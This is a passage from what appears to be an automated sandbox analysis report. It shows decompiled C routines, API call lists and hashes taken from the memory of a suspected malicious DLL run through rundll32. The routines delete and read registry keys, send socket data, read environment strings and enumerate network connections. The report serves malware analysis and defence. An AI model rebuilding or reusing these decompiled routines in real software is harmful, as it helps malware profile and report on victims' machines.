                                                                                              					if(RegOpenKeyExW(_a8, _t55, 0, 0x20106,  &_a4) == 0) {
                                                                                              						SHDeleteKeyW(_a4, 0x429c5d0);
                                                                                              						asm("sbb esi, esi");
                                                                                              						_t57 = 1;
                                                                                              						RegCloseKey(_a4);
                                                                                              					}
                                                                                              					_push(_t49);
                                                                                              					_push(0x3f);
                                                                                              					_push(_v12);
                                                                                              					 *_v8 = _t57;
                                                                                              					_push(_t46);
                                                                                              					E04251C60( *((intOrPtr*)(_v16 + 4)));
                                                                                              					_t32 = LocalFree(_t46);
                                                                                              					if(_t55 != 0) {
                                                                                              						return E04275B0F(_t55);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t32;
                                                                                              			}



















                                                                                              0x042611e0
                                                                                              0x042611ea
                                                                                              0x042611ed
                                                                                              0x042611ef
                                                                                              0x042611f2
                                                                                              0x042611f8
                                                                                              0x042611ff
                                                                                              0x04261201
                                                                                              0x04261209
                                                                                              0x04261220
                                                                                              0x04261223
                                                                                              0x0426120b
                                                                                              0x0426120b
                                                                                              0x04261212
                                                                                              0x04261212
                                                                                              0x04261226
                                                                                              0x04261229
                                                                                              0x04261232
                                                                                              0x04261234
                                                                                              0x0426123a
                                                                                              0x0426123b
                                                                                              0x04261241
                                                                                              0x0426124e
                                                                                              0x04261251
                                                                                              0x0426125c
                                                                                              0x0426125f
                                                                                              0x04261264
                                                                                              0x0426127a
                                                                                              0x04261284
                                                                                              0x0426128f
                                                                                              0x04261291
                                                                                              0x04261292
                                                                                              0x04261292
                                                                                              0x0426129b
                                                                                              0x0426129f
                                                                                              0x042612a1
                                                                                              0x042612a4
                                                                                              0x042612a9
                                                                                              0x042612aa
                                                                                              0x042612b0
                                                                                              0x042612b9
                                                                                              0x00000000
                                                                                              0x042612c1
                                                                                              0x042612b9
                                                                                              0x042612c9

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04261244
                                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020106,?), ref: 04261272
                                                                                              • SHDeleteKeyW.SHLWAPI(?,0429C5D0), ref: 04261284
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04261292
                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 042612B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$AllocCloseDeleteFreeOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3791902735-0
                                                                                              • Opcode ID: 0b5eea9b41ced2f279f5941a7ed8e2f17966d05ea81179928a2dad92441b6df9
                                                                                              • Instruction ID: 66a4571a81b441e823392ebdf60fdda9a814f226fc5ce2be3712b651b2f208c6
                                                                                              • Opcode Fuzzy Hash: 0b5eea9b41ced2f279f5941a7ed8e2f17966d05ea81179928a2dad92441b6df9
                                                                                              • Instruction Fuzzy Hash: D43151B5A10219FBDB10DFA8DC84AAEBBB8FF44354F108125F906E7241E775AA51CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E0426F770(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr* _t43;
                                                                                              				intOrPtr _t45;
                                                                                              				intOrPtr _t48;
                                                                                              				intOrPtr _t49;
                                                                                              				intOrPtr _t50;
                                                                                              				struct _CRITICAL_SECTION* _t51;
                                                                                              				intOrPtr _t52;
                                                                                              
                                                                                              				_t50 = _a4;
                                                                                              				_t43 = __ecx;
                                                                                              				if( *((intOrPtr*)(_t50 + 0x18)) ==  *((intOrPtr*)(_t50 + 0x14))) {
                                                                                              					L5:
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t49 =  *((intOrPtr*)(_t50 + 0x14));
                                                                                              						_t45 =  *((intOrPtr*)(_t43 + 0x2c));
                                                                                              						_t31 =  *((intOrPtr*)(_t50 + 0x18)) - _t49;
                                                                                              						_t46 =  <  ? _t31 : _t45;
                                                                                              						__imp__#19( *((intOrPtr*)(_t43 + 0x1c)), _t49,  <  ? _t31 : _t45, 0);
                                                                                              						_a4 = _t31;
                                                                                              						if(_t31 <= 0) {
                                                                                              							if(_t31 == 0xffffffff) {
                                                                                              								__imp__#111();
                                                                                              								if(_t31 != 0x2733) {
                                                                                              									 *((intOrPtr*)(_t43 + 0x14)) = _t31;
                                                                                              									 *((intOrPtr*)(_t43 + 0xc)) = 1;
                                                                                              									 *((intOrPtr*)(_t43 + 0x10)) = 3;
                                                                                              									 *((intOrPtr*)(_t43 + 0x18)) = 1;
                                                                                              									return 0;
                                                                                              								} else {
                                                                                              									 *_a8 = 1;
                                                                                              									return 1;
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L4;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t51 = _t43 + 0x14c;
                                                                                              							EnterCriticalSection(_t51);
                                                                                              							 *((intOrPtr*)(_t43 + 0x180)) =  *((intOrPtr*)(_t43 + 0x180)) - _a4;
                                                                                              							LeaveCriticalSection(_t51);
                                                                                              							SetLastError(0);
                                                                                              							_t52 = _a4;
                                                                                              							 *((intOrPtr*)( *_t43 + 0x84))( *((intOrPtr*)(_t50 + 0x14)), _t52);
                                                                                              							_t48 =  *((intOrPtr*)(_t50 + 0x14));
                                                                                              							_t53 =  <  ?  *((intOrPtr*)(_t50 + 0x18)) - _t48 : _t52;
                                                                                              							 *((intOrPtr*)(_t50 + 0x14)) = _t48 + ( <  ?  *((intOrPtr*)(_t50 + 0x18)) - _t48 : _t52);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              						L4:
                                                                                              					} while ( *((intOrPtr*)(_t50 + 0x18)) !=  *((intOrPtr*)(_t50 + 0x14)));
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				L9:
                                                                                              			}











                                                                                              0x0426f776
                                                                                              0x0426f779
                                                                                              0x0426f781
                                                                                              0x0426f801
                                                                                              0x0426f808
                                                                                              0x0426f783
                                                                                              0x0426f783
                                                                                              0x0426f783
                                                                                              0x0426f789
                                                                                              0x0426f78c
                                                                                              0x0426f792
                                                                                              0x0426f79a
                                                                                              0x0426f7a0
                                                                                              0x0426f7a5
                                                                                              0x0426f7f5
                                                                                              0x0426f80b
                                                                                              0x0426f816
                                                                                              0x0426f82e
                                                                                              0x0426f834
                                                                                              0x0426f83b
                                                                                              0x0426f842
                                                                                              0x0426f84b
                                                                                              0x0426f818
                                                                                              0x0426f81e
                                                                                              0x0426f82a
                                                                                              0x0426f82a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426f7a7
                                                                                              0x0426f7a7
                                                                                              0x0426f7ae
                                                                                              0x0426f7b7
                                                                                              0x0426f7be
                                                                                              0x0426f7c6
                                                                                              0x0426f7cc
                                                                                              0x0426f7d7
                                                                                              0x0426f7dd
                                                                                              0x0426f7e7
                                                                                              0x0426f7ed
                                                                                              0x00000000
                                                                                              0x0426f7ed
                                                                                              0x00000000
                                                                                              0x0426f7f7
                                                                                              0x0426f7fa
                                                                                              0x00000000
                                                                                              0x0426f783
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • send.WS2_32(?,?,?,00000000), ref: 0426F79A
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0426F7AE
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426F7BE
                                                                                              • SetLastError.KERNEL32(00000000,?,?,0426F6B6,?,00000000), ref: 0426F7C6
                                                                                              • WSAGetLastError.WS2_32(?,?,0426F6B6,?,00000000), ref: 0426F80B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterLeavesend
                                                                                              • String ID:
                                                                                              • API String ID: 421069059-0
                                                                                              • Opcode ID: 915e9324d97e3cbed80cc655d85467446f38750506bf2bf88f1b1b41a64e4c90
                                                                                              • Instruction ID: 0f49534a17d40dd030f11c2f435f9a21596f9507a57dbcb82d1886d2ebe785b4
                                                                                              • Opcode Fuzzy Hash: 915e9324d97e3cbed80cc655d85467446f38750506bf2bf88f1b1b41a64e4c90
                                                                                              • Instruction Fuzzy Hash: 83215C76310505AFDB04DF6DE988A99BBB4FB48320F114266E809CB240D775FD91CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E04260C60(void* __ecx, short* __edx, char* _a8) {
                                                                                              				int _v8;
                                                                                              				void* _v12;
                                                                                              				int _v16;
                                                                                              				void* __esi;
                                                                                              				char* _t19;
                                                                                              				char* _t22;
                                                                                              				long _t26;
                                                                                              				char* _t28;
                                                                                              				char* _t33;
                                                                                              
                                                                                              				_t32 = __ecx;
                                                                                              				if(RegOpenKeyExW(__ecx, __edx, 0, 0x20119,  &_v12) == 0) {
                                                                                              					_v8 = 0;
                                                                                              					_t36 = 0;
                                                                                              					_t19 = RegQueryValueExW(_v12, "1", 0,  &_v16, 0,  &_v8);
                                                                                              					__eflags = _t19;
                                                                                              					if(_t19 != 0) {
                                                                                              						L11:
                                                                                              						RegCloseKey(_v12);
                                                                                              						return _t36;
                                                                                              					} else {
                                                                                              						_t22 = _v8;
                                                                                              						__eflags = _t22;
                                                                                              						if(__eflags == 0) {
                                                                                              							goto L11;
                                                                                              						} else {
                                                                                              							_push(_t22);
                                                                                              							_t36 = E04275B55(_t32, 0, __eflags);
                                                                                              							__eflags = _t36;
                                                                                              							if(_t36 == 0) {
                                                                                              								goto L11;
                                                                                              							} else {
                                                                                              								_t26 = RegQueryValueExW(_v12, "1", 0,  &_v16, _t36,  &_v8);
                                                                                              								__eflags = _t26;
                                                                                              								if(_t26 != 0) {
                                                                                              									L10:
                                                                                              									E04275B0F(_t36);
                                                                                              									_t36 = 0;
                                                                                              									__eflags = 0;
                                                                                              									goto L11;
                                                                                              								} else {
                                                                                              									_t28 = _v8;
                                                                                              									__eflags = _t28;
                                                                                              									if(_t28 == 0) {
                                                                                              										goto L10;
                                                                                              									} else {
                                                                                              										__eflags = _v16 - 3;
                                                                                              										if(_v16 != 3) {
                                                                                              											goto L10;
                                                                                              										} else {
                                                                                              											_t33 = _a8;
                                                                                              											__eflags = _t33;
                                                                                              											if(_t33 == 0) {
                                                                                              												goto L11;
                                                                                              											} else {
                                                                                              												 *_t33 = _t28;
                                                                                              												RegCloseKey(_v12);
                                                                                              												return _t36;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}












                                                                                              0x04260c60
                                                                                              0x04260c7b
                                                                                              0x04260c87
                                                                                              0x04260c8f
                                                                                              0x04260c9f
                                                                                              0x04260ca5
                                                                                              0x04260ca7
                                                                                              0x04260d0d
                                                                                              0x04260d10
                                                                                              0x04260d1c
                                                                                              0x04260ca9
                                                                                              0x04260ca9
                                                                                              0x04260cac
                                                                                              0x04260cae
                                                                                              0x00000000
                                                                                              0x04260cb0
                                                                                              0x04260cb0
                                                                                              0x04260cb6
                                                                                              0x04260cbb
                                                                                              0x04260cbd
                                                                                              0x00000000
                                                                                              0x04260cbf
                                                                                              0x04260cd2
                                                                                              0x04260cd8
                                                                                              0x04260cda
                                                                                              0x04260d02
                                                                                              0x04260d03
                                                                                              0x04260d0b
                                                                                              0x04260d0b
                                                                                              0x00000000
                                                                                              0x04260cdc
                                                                                              0x04260cdc
                                                                                              0x04260cdf
                                                                                              0x04260ce1
                                                                                              0x00000000
                                                                                              0x04260ce3
                                                                                              0x04260ce3
                                                                                              0x04260ce7
                                                                                              0x00000000
                                                                                              0x04260ce9
                                                                                              0x04260ce9
                                                                                              0x04260cec
                                                                                              0x04260cee
                                                                                              0x00000000
                                                                                              0x04260cf0
                                                                                              0x04260cf3
                                                                                              0x04260cf5
                                                                                              0x04260d01
                                                                                              0x04260d01
                                                                                              0x04260cee
                                                                                              0x04260ce7
                                                                                              0x04260ce1
                                                                                              0x04260cda
                                                                                              0x04260cbd
                                                                                              0x04260cae
                                                                                              0x04260c7d
                                                                                              0x04260c82
                                                                                              0x04260c82

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0426966F,?,?), ref: 04260C73
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,00000000,?,?), ref: 04260C9F
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,00000000,00000000), ref: 04260CD2
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04260CF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue$CloseOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1586453840-0
                                                                                              • Opcode ID: 2091ef31f0ed8992fdefcc4c10adcb89110ff3ddc3dc0e2f32c1f2df8e15b1d6
                                                                                              • Instruction ID: 48cbc8365803c83babcaa2d64aabd80d516cf0939e5288d57cd869d8b14a7af7
                                                                                              • Opcode Fuzzy Hash: 2091ef31f0ed8992fdefcc4c10adcb89110ff3ddc3dc0e2f32c1f2df8e15b1d6
                                                                                              • Instruction Fuzzy Hash: 84215E71B11219BBDB20DEA4AC49FAEBBBCEF00605F0441A5FC0AE2141E731BE50DA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E04275A30(void* __ebx, HANDLE* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				struct tagMSG _v36;
                                                                                              				signed int _v40;
                                                                                              				HANDLE* _v44;
                                                                                              				signed int _t15;
                                                                                              				signed int _t16;
                                                                                              				signed int _t17;
                                                                                              				int _t18;
                                                                                              				int _t21;
                                                                                              				void* _t30;
                                                                                              				long _t34;
                                                                                              				void* _t40;
                                                                                              				void* _t43;
                                                                                              				signed int _t46;
                                                                                              
                                                                                              				_t43 = __esi;
                                                                                              				_t40 = __edi;
                                                                                              				_t30 = __ebx;
                                                                                              				_t15 =  *0x42a4008; // 0xd33db39d
                                                                                              				_t16 = _t15 ^ _t46;
                                                                                              				_v8 = _t16;
                                                                                              				_t33 = timeGetTime;
                                                                                              				_v44 = __edx;
                                                                                              				if(_a4 != 0xffffffff) {
                                                                                              					_t17 = timeGetTime();
                                                                                              					_t33 = timeGetTime;
                                                                                              				} else {
                                                                                              					_t17 = _t16 | 0xffffffff;
                                                                                              				}
                                                                                              				_push(_t30);
                                                                                              				_push(_t43);
                                                                                              				_push(_t40);
                                                                                              				_v40 = _t17;
                                                                                              				L4:
                                                                                              				while(1) {
                                                                                              					do {
                                                                                              						if(_t17 == 0xffffffff) {
                                                                                              							_t34 = _t33 | 0xffffffff;
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							_t34 = _v40 -  *_t33() + _a4;
                                                                                              							if(_t34 > 0) {
                                                                                              								L9:
                                                                                              								_t18 = MsgWaitForMultipleObjects(1, _v44, 0, _t34, 0x4ff);
                                                                                              								if(_t18 == 1) {
                                                                                              									goto L10;
                                                                                              								}
                                                                                              							} else {
                                                                                              							}
                                                                                              						}
                                                                                              						return E04275AFE(_v8 ^ _t46);
                                                                                              						L10:
                                                                                              						_t21 = PeekMessageW( &_v36, 0, 0, 0, _t18);
                                                                                              						_t33 = timeGetTime;
                                                                                              						_t17 = _v40;
                                                                                              					} while (_t21 == 0);
                                                                                              					do {
                                                                                              						TranslateMessage( &_v36);
                                                                                              						DispatchMessageW( &_v36);
                                                                                              					} while (PeekMessageW( &_v36, 0, 0, 0, 1) != 0);
                                                                                              					_t17 = _v40;
                                                                                              					_t33 = timeGetTime;
                                                                                              				}
                                                                                              			}

















                                                                                              0x04275a30
                                                                                              0x04275a30
                                                                                              0x04275a30
                                                                                              0x04275a36
                                                                                              0x04275a3b
                                                                                              0x04275a3d
                                                                                              0x04275a44
                                                                                              0x04275a4a
                                                                                              0x04275a4d
                                                                                              0x04275a54
                                                                                              0x04275a56
                                                                                              0x04275a4f
                                                                                              0x04275a4f
                                                                                              0x04275a4f
                                                                                              0x04275a5c
                                                                                              0x04275a63
                                                                                              0x04275a6a
                                                                                              0x04275a71
                                                                                              0x00000000
                                                                                              0x04275a74
                                                                                              0x04275a74
                                                                                              0x04275a77
                                                                                              0x04275a9d
                                                                                              0x00000000
                                                                                              0x04275a79
                                                                                              0x04275a80
                                                                                              0x04275a85
                                                                                              0x04275aa0
                                                                                              0x04275aad
                                                                                              0x04275ab6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275a87
                                                                                              0x04275a87
                                                                                              0x04275a85
                                                                                              0x04275a9c
                                                                                              0x04275ab8
                                                                                              0x04275ac3
                                                                                              0x04275ac5
                                                                                              0x04275acd
                                                                                              0x04275acd
                                                                                              0x04275ad2
                                                                                              0x04275ad6
                                                                                              0x04275adc
                                                                                              0x04275aec
                                                                                              0x04275af0
                                                                                              0x04275af3
                                                                                              0x04275af3

                                                                                              APIs
                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,73CB44A0,000004FF), ref: 04275AAD
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04275AC3
                                                                                              • TranslateMessage.USER32(?), ref: 04275AD6
                                                                                              • DispatchMessageW.USER32(?), ref: 04275ADC
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04275AEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                              • String ID:
                                                                                              • API String ID: 2015114452-0
                                                                                              • Opcode ID: 330495db39b0c79bee824c33047af7e61dee062c123e899f01c5b946e5fbc1cd
                                                                                              • Instruction ID: 3a444e1f234002c4377c578e058f84679bcc0dd6d849c6244559e39fa99af8da
                                                                                              • Opcode Fuzzy Hash: 330495db39b0c79bee824c33047af7e61dee062c123e899f01c5b946e5fbc1cd
                                                                                              • Instruction Fuzzy Hash: 3A217431B15209ABDB14EEA8EC95FEDB7B8EB49724F100229E511E71C0DA74BC418B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 54%
                                                                                              			E0425DB90(intOrPtr __ecx, void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t14;
                                                                                              				void* _t15;
                                                                                              				int _t17;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              				void* _t30;
                                                                                              				long _t31;
                                                                                              				void* _t34;
                                                                                              				void* _t35;
                                                                                              				void* _t36;
                                                                                              				void* _t37;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_v16 = __ecx;
                                                                                              				_t34 = 0;
                                                                                              				_t26 = 0;
                                                                                              				_v8 = E0425D570(0, _t35);
                                                                                              				_t14 = E0425D980(0, _t35);
                                                                                              				_t29 = LocalSize;
                                                                                              				_t36 = _t14;
                                                                                              				_t15 = _v8;
                                                                                              				_v12 = _t36;
                                                                                              				if(_t15 != 0) {
                                                                                              					_t15 = LocalSize(_t15);
                                                                                              					_t29 = LocalSize;
                                                                                              					_t34 = _t15;
                                                                                              				}
                                                                                              				if(_t36 != 0) {
                                                                                              					_t15 =  *_t29(_t36);
                                                                                              					_t26 = _t15;
                                                                                              				}
                                                                                              				_t30 = _t26 + _t34;
                                                                                              				if(_t30 != 0) {
                                                                                              					_t31 = _t30 + 1;
                                                                                              					_t37 = LocalAlloc(0x40, _t31);
                                                                                              					 *_t37 = 0x8e;
                                                                                              					if(_t34 != 0) {
                                                                                              						_t7 = _t37 + 1; // 0x1
                                                                                              						_t31 = _t7;
                                                                                              						E0427E060(_t31, _v8, _t34);
                                                                                              						_t38 = _t38 + 0xc;
                                                                                              						LocalFree(_v8);
                                                                                              					}
                                                                                              					if(_t26 != 0) {
                                                                                              						_t27 = _v12;
                                                                                              						_t10 = _t37 + 1; // 0x1
                                                                                              						E0427E060(_t10 + _t34, _t27, _t26);
                                                                                              						LocalFree(_t27);
                                                                                              					}
                                                                                              					_t17 = LocalSize(_t37);
                                                                                              					_push(_t31);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t17);
                                                                                              					_push(_t37);
                                                                                              					E04251C60( *((intOrPtr*)(_v16 + 4)));
                                                                                              					return LocalFree(_t37);
                                                                                              				}
                                                                                              				return _t15;
                                                                                              			}




















                                                                                              0x0425db99
                                                                                              0x0425db9c
                                                                                              0x0425db9e
                                                                                              0x0425dba5
                                                                                              0x0425dba8
                                                                                              0x0425dbad
                                                                                              0x0425dbb3
                                                                                              0x0425dbb5
                                                                                              0x0425dbb8
                                                                                              0x0425dbbd
                                                                                              0x0425dbc0
                                                                                              0x0425dbc2
                                                                                              0x0425dbc8
                                                                                              0x0425dbc8
                                                                                              0x0425dbcc
                                                                                              0x0425dbcf
                                                                                              0x0425dbd1
                                                                                              0x0425dbd1
                                                                                              0x0425dbd3
                                                                                              0x0425dbd8
                                                                                              0x0425dbda
                                                                                              0x0425dbe4
                                                                                              0x0425dbe6
                                                                                              0x0425dbeb
                                                                                              0x0425dbf1
                                                                                              0x0425dbf1
                                                                                              0x0425dbf5
                                                                                              0x0425dbfa
                                                                                              0x0425dc00
                                                                                              0x0425dc00
                                                                                              0x0425dc08
                                                                                              0x0425dc0b
                                                                                              0x0425dc0e
                                                                                              0x0425dc15
                                                                                              0x0425dc1e
                                                                                              0x0425dc1e
                                                                                              0x0425dc25
                                                                                              0x0425dc2b
                                                                                              0x0425dc2f
                                                                                              0x0425dc31
                                                                                              0x0425dc32
                                                                                              0x0425dc36
                                                                                              0x00000000
                                                                                              0x0425dc3c
                                                                                              0x0425dc48

                                                                                              APIs
                                                                                                • Part of subcall function 0425D570: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D59F
                                                                                                • Part of subcall function 0425D570: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0425D5C1
                                                                                                • Part of subcall function 0425D980: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D9BB
                                                                                                • Part of subcall function 0425D980: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0425D9CB
                                                                                              • LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0425DBDE
                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 0425DC00
                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 0425DC1E
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DC25
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0425DC3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$Free$AddressLibraryLoadProc$AllocSize
                                                                                              • String ID:
                                                                                              • API String ID: 3284714279-0
                                                                                              • Opcode ID: 8f7f7336a7ccd56cb4559df031c4d9a841a1e9646e24aba733ef056777967cc1
                                                                                              • Instruction ID: 35baac608ff365e101344cada0411723c35a799385b1e018b6c486ff8f051036
                                                                                              • Opcode Fuzzy Hash: 8f7f7336a7ccd56cb4559df031c4d9a841a1e9646e24aba733ef056777967cc1
                                                                                              • Instruction Fuzzy Hash: 2D21D571B14206ABD728AFB9EC48E6FBBBDEF48345710416CEC06A3211DE34AD018664
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0428A67B() {
                                                                                              				int _v8;
                                                                                              				void* __ecx;
                                                                                              				void* _t6;
                                                                                              				int _t7;
                                                                                              				char* _t13;
                                                                                              				int _t17;
                                                                                              				void* _t19;
                                                                                              				char* _t25;
                                                                                              				WCHAR* _t27;
                                                                                              
                                                                                              				_t27 = GetEnvironmentStringsW();
                                                                                              				if(_t27 == 0) {
                                                                                              					L7:
                                                                                              					_t13 = 0;
                                                                                              				} else {
                                                                                              					_t6 = E0428A644(_t27);
                                                                                              					_pop(_t19);
                                                                                              					_t17 = _t6 - _t27 >> 1;
                                                                                              					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                                              					_v8 = _t7;
                                                                                              					if(_t7 == 0) {
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						_t25 = E042884E7(_t19, _t7);
                                                                                              						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                                              							_t13 = 0;
                                                                                              						} else {
                                                                                              							_t13 = _t25;
                                                                                              							_t25 = 0;
                                                                                              						}
                                                                                              						E042884AD(_t25);
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t27 != 0) {
                                                                                              					FreeEnvironmentStringsW(_t27);
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}












                                                                                              0x0428a68a
                                                                                              0x0428a690
                                                                                              0x0428a6e8
                                                                                              0x0428a6e8
                                                                                              0x0428a692
                                                                                              0x0428a693
                                                                                              0x0428a698
                                                                                              0x0428a6a1
                                                                                              0x0428a6a7
                                                                                              0x0428a6ad
                                                                                              0x0428a6b2
                                                                                              0x00000000
                                                                                              0x0428a6b4
                                                                                              0x0428a6ba
                                                                                              0x0428a6bf
                                                                                              0x0428a6dd
                                                                                              0x0428a6d7
                                                                                              0x0428a6d7
                                                                                              0x0428a6d9
                                                                                              0x0428a6d9
                                                                                              0x0428a6e0
                                                                                              0x0428a6e5
                                                                                              0x0428a6b2
                                                                                              0x0428a6ec
                                                                                              0x0428a6ef
                                                                                              0x0428a6ef
                                                                                              0x0428a6fd

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0428A684
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0428A6A7
                                                                                                • Part of subcall function 042884E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04288519
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0428A6CD
                                                                                              • _free.LIBCMT ref: 0428A6E0
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0428A6EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: b69926823dbaf64ca3b037951c1a5c3c56fe49e9ddf5c03e513ef6ac7825b8f3
                                                                                              • Instruction ID: 7d0e08bc6de5c997bf52134cfde8f9829d1a7d28033af5c8f9096770868e896f
                                                                                              • Opcode Fuzzy Hash: b69926823dbaf64ca3b037951c1a5c3c56fe49e9ddf5c03e513ef6ac7825b8f3
                                                                                              • Instruction Fuzzy Hash: FA01D8727172657F2B2135BA6C8CC7F6B6CDEC6AA5325011EB804C6184EEA5AC02D1B4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E042743A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _t17;
                                                                                              				intOrPtr _t24;
                                                                                              				long _t31;
                                                                                              				struct _CRITICAL_SECTION* _t34;
                                                                                              
